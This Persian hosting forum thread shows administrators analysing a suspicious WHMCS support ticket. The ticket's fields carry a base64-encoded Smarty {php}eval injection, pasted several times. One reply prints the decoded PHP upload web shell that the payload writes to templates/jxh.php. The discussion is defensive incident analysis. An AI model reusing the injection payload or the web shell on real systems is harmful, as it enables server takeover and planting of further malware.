نمایش نتایج: از شماره 1 تا 9 , از مجموع 9

موضوع: ارسال تیکت پشتیبانی مشکوک برای واحد فروش

  1. #1
    عضو انجمن zigma4000 آواتار ها
    تاریخ عضویت
    Dec 2012
    محل سکونت
    SSD
    نوشته ها
    271
    تشکر تشکر کرده 
    270
    تشکر تشکر شده 
    332
    تشکر شده در
    251 پست

    پیش فرض ارسال تیکت پشتیبانی مشکوک برای واحد فروش

    سلام،

    من چنین تیکتی رو در سیستم تیکتینگ پشتیبانی سایت دریافت کردم :

    Client: {php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb 2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJ qMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltM TFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVnd iRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZM mh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDB pWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsU FNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFh Cc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzT kNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2I yRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5Z G1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJ KMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZa jVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p 5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzY jJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUg wTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigidGVtcGxhdGVzL 2p4aC5waHAiLCJ3Iik7DQpmd3JpdGUoJGZvLCRjb2RlKTt=')) ;{/php})

    Department: واحد فروش
    Subject: {php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb 2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJ qMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltM TFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVnd iRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZM mh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDB pWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsU FNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFh Cc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzT kNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2I yRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5Z G1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJ KMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZa jVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p 5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzY jJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUg wTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigidGVtcGxhdGVzL 2p4aC5waHAiLCJ3Iik7DQpmd3JpdGUoJGZvLCRjb2RlKTt=')) ;{/php})
    Priority: Medium


    ---
    {php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb 2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJ qMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltM TFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVnd iRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZM mh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDB pWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsU FNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFh Cc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzT kNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2I yRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5Z G1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJ KMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZa jVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p 5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzY jJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUg wTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigidGVtcGxhdGVzL 2p4aC5waHAiLCJ3Iik7DQpmd3JpdGUoJGZvLCRjb2RlKTt=')) ;{/php})

    ----------------------------
    IP Address: 180.253.136.118

    این IP برای اندونزی هستش و بعد ازین کار دیگه ای انجام نداده. whmcs آخرین ورژنش هست و برای whmcs هم این مطلب رو ارسال کردم تا بررسی کنند. نظر شما چیه؟

  2. # ADS




     

  3. #2
    عضو انجمن sitetheme آواتار ها
    تاریخ عضویت
    Aug 2013
    نوشته ها
    451
    تشکر تشکر کرده 
    1,441
    تشکر تشکر شده 
    499
    تشکر شده در
    401 پست

    پیش فرض پاسخ : ارسال تیکت پشتیبانی مشکوک برای واحد فروش

    سلام عزیز از اونجایی که بنده اطلاع دارم اینها کد های شل هست یعنی جهت هک اسکریپت استفاده میشه شما تنها کاری که میتونید بکنید تیکت رو حذف کنید و ارسال کننده رو بن کنید

  4. #3
    عضو انجمن zigma4000 آواتار ها
    تاریخ عضویت
    Dec 2012
    محل سکونت
    SSD
    نوشته ها
    271
    تشکر تشکر کرده 
    270
    تشکر تشکر شده 
    332
    تشکر شده در
    251 پست

    پیش فرض پاسخ : ارسال تیکت پشتیبانی مشکوک برای واحد فروش

    نقل قول نوشته اصلی توسط sitetheme نمایش پست ها
    سلام عزیز از اونجایی که بنده اطلاع دارم اینها کد های شل هست یعنی جهت هک اسکریپت استفاده میشه شما تنها کاری که میتونید بکنید تیکت رو حذف کنید و ارسال کننده رو بن کنید
    در جریان هستم که تلاش برای هَک بوده، هم آی‌پی بَن شده و هم تیکت پاک شده. میخواستم بدونم دوستان اطلاعی در این زمینه دارن. باگ جدیدی نباشه. باید منتظر جواب whmcs بمونم.
    گـــُزگـــا هاستینگ
    هاست دانلود اختصاصی حجیم (دو ترابایت به بالا) - هاست پربازدید اختصاصی - کانفیگ اختصاصی و... برای هرگونه سوال پیش از خرید با ما تماس بگیرید

  5. #4
    عضو جدید wolfsaman آواتار ها
    تاریخ عضویت
    Dec 2011
    نوشته ها
    31
    تشکر تشکر کرده 
    37
    تشکر تشکر شده 
    82
    تشکر شده در
    53 پست

    پیش فرض پاسخ : ارسال تیکت پشتیبانی مشکوک برای واحد فروش

    این کد تو هاست شما یه فایلی به اسم
    templates/jxh.php
    میسازه و تو این فایل فرم آپلود قرار میده
    که شخص هکر با اون فرم میتونه ویروس یا حتی دستور دریافت پسورد مدیریت رو اپلود کنه و بعد دریافتش کنه
    Relax, just... let go.

  6. #5
    عضو انجمن
    تاریخ عضویت
    Apr 2013
    نوشته ها
    116
    تشکر تشکر کرده 
    76
    تشکر تشکر شده 
    206
    تشکر شده در
    169 پست

    پیش فرض پاسخ : ارسال تیکت پشتیبانی مشکوک برای واحد فروش

    این شل کد شده هست که هکر اقدام به هک کردن سیستم شما کرده که اگر آپگرید شده باشه سیستم و مسائل امنیتی را رعایت کنی و این کد ها را در اسپم قرار بده تا مشکلت حل بشه

  7. #6
    عضو انجمن zigma4000 آواتار ها
    تاریخ عضویت
    Dec 2012
    محل سکونت
    SSD
    نوشته ها
    271
    تشکر تشکر کرده 
    270
    تشکر تشکر شده 
    332
    تشکر شده در
    251 پست

    پیش فرض پاسخ : ارسال تیکت پشتیبانی مشکوک برای واحد فروش

    از طرف whmcs اعلام کردن که تلاش برای نفوذ بوده، اما این کد روی آخرین نسخه WHMCS 5.3.6 تاثیری نداره و مشکلی به وجود نمیاد. دوستان WHMCS اتون رو به روز نگه دارید.
    گـــُزگـــا هاستینگ
    هاست دانلود اختصاصی حجیم (دو ترابایت به بالا) - هاست پربازدید اختصاصی - کانفیگ اختصاصی و... برای هرگونه سوال پیش از خرید با ما تماس بگیرید

  8. تعداد تشکر ها از zigma4000 به دلیل پست مفید


  9. #7
    عضو انجمن Taryan4 آواتار ها
    تاریخ عضویت
    Jul 2013
    نوشته ها
    190
    تشکر تشکر کرده 
    78
    تشکر تشکر شده 
    580
    تشکر شده در
    450 پست

    پیش فرض پاسخ : ارسال تیکت پشتیبانی مشکوک برای واحد فروش

    این کد برای ورژن های پایین Whmcs خطرناک است. و اگر فایل های اعلام شده در تنظیمات امنیتی whmcs را قبل از روت قرار دهید و پرمیژن مناسب دهید مشکلی به وجود نمی آورد.
    || هاست- سرور مجازی - لایسنس TARYANACO.COM
    || پورتال ایده پردازان تاریانا ((برای مشاوره رایگان در تماس باشید.))

    ||دارای نماد اعتماد الکترونیک

  10. #8
    عضو دائم OmidX آواتار ها
    تاریخ عضویت
    Apr 2011
    محل سکونت
    Tehran
    نوشته ها
    2,472
    تشکر تشکر کرده 
    1,165
    تشکر تشکر شده 
    3,648
    تشکر شده در
    2,594 پست

    پیش فرض پاسخ : ارسال تیکت پشتیبانی مشکوک برای واحد فروش

    نقل قول نوشته اصلی توسط zigma4000 نمایش پست ها
    سلام،

    من چنین تیکتی رو در سیستم تیکتینگ پشتیبانی سایت دریافت کردم :

    Client: {php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb 2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJ qMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltM TFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVnd iRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZM mh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDB pWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsU FNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFh Cc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzT kNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2I yRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5Z G1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJ KMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZa jVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p 5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzY jJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUg wTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigidGVtcGxhdGVzL 2p4aC5waHAiLCJ3Iik7DQpmd3JpdGUoJGZvLCRjb2RlKTt=')) ;{/php})

    Department: واحد فروش
    Subject: {php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb 2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJ qMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltM TFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVnd iRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZM mh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDB pWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsU FNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFh Cc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzT kNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2I yRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5Z G1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJ KMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZa jVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p 5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzY jJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUg wTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigidGVtcGxhdGVzL 2p4aC5waHAiLCJ3Iik7DQpmd3JpdGUoJGZvLCRjb2RlKTt=')) ;{/php})
    Priority: Medium


    ---
    {php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb 2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJ qMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltM TFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVnd iRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZM mh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDB pWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsU FNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFh Cc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzT kNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2I yRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5Z G1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJ KMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZa jVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p 5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzY jJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUg wTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigidGVtcGxhdGVzL 2p4aC5waHAiLCJ3Iik7DQpmd3JpdGUoJGZvLCRjb2RlKTt=')) ;{/php})

    ----------------------------
    IP Address: 180.253.136.118

    این IP برای اندونزی هستش و بعد ازین کار دیگه ای انجام نداده. whmcs آخرین ورژنش هست و برای whmcs هم این مطلب رو ارسال کردم تا بررسی کنند. نظر شما چیه؟
    decode شده کد بالا ، میشه این :

    کد:
    <?phpecho '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
    echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
    if( $_POST['_upl'] == "Upload" ) {
    	if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }
    	else { echo '<b>Upload GAGAL !!!</b><br><br>'; }
    }
    ?>
    یک شل ب نام jxh.php در پوشه templates شما آپلود شده احتمالا ، ک باید حذفش کنید .
    ...Zzzz...

  11. #9
    عضو دائم mhiizadi آواتار ها
    تاریخ عضویت
    Aug 2013
    محل سکونت
    اصفهان
    نوشته ها
    2,098
    تشکر تشکر کرده 
    1,944
    تشکر تشکر شده 
    3,682
    تشکر شده در
    2,418 پست

    پیش فرض پاسخ : ارسال تیکت پشتیبانی مشکوک برای واحد فروش

    نقل قول نوشته اصلی توسط OmidX نمایش پست ها
    decode شده کد بالا ، میشه این :

    کد:
    <?phpecho '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
    echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
    if( $_POST['_upl'] == "Upload" ) {
        if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }
        else { echo '<b>Upload GAGAL !!!</b><br><br>'; }
    }
    ?>
    یک شل ب نام jxh.php در پوشه templates شما آپلود شده احتمالا ، ک باید حذفش کنید .
    اسم شل ثابت نیست

اطلاعات موضوع

کاربرانی که در حال مشاهده این موضوع هستند

در حال حاضر 1 کاربر در حال مشاهده این موضوع است. (0 کاربران و 1 مهمان ها)

موضوعات مشابه

  1. پاسخ ها: 90
    آخرين نوشته: September 7th, 2018, 21:45
  2. دانلود اسکریپت پشتیبانی تیکتینگ “پشتیبان” نسخه ۱٫۱
    توسط H a m ! d در انجمن اسکریپت های دیگر
    پاسخ ها: 0
    آخرين نوشته: September 11th, 2015, 13:22
  3. سیستم تیکتینگ و پشتیبانی
    توسط DarkSoroush در انجمن سیستم های مدیریت محتوا
    پاسخ ها: 21
    آخرين نوشته: July 8th, 2014, 17:07
  4. معرفی اسکریپت پشتیبانی تیکتینگ فارسی
    توسط parsa53 در انجمن اسکریپت های دیگر
    پاسخ ها: 29
    آخرين نوشته: June 30th, 2014, 19:03
  5. پاسخ ها: 0
    آخرين نوشته: December 3rd, 2012, 07:54

مجوز های ارسال و ویرایش

  • شما نمیتوانید موضوع جدیدی ارسال کنید
  • شما امکان ارسال پاسخ را ندارید
  • شما نمیتوانید فایل پیوست کنید.
  • شما نمیتوانید پست های خود را ویرایش کنید
  •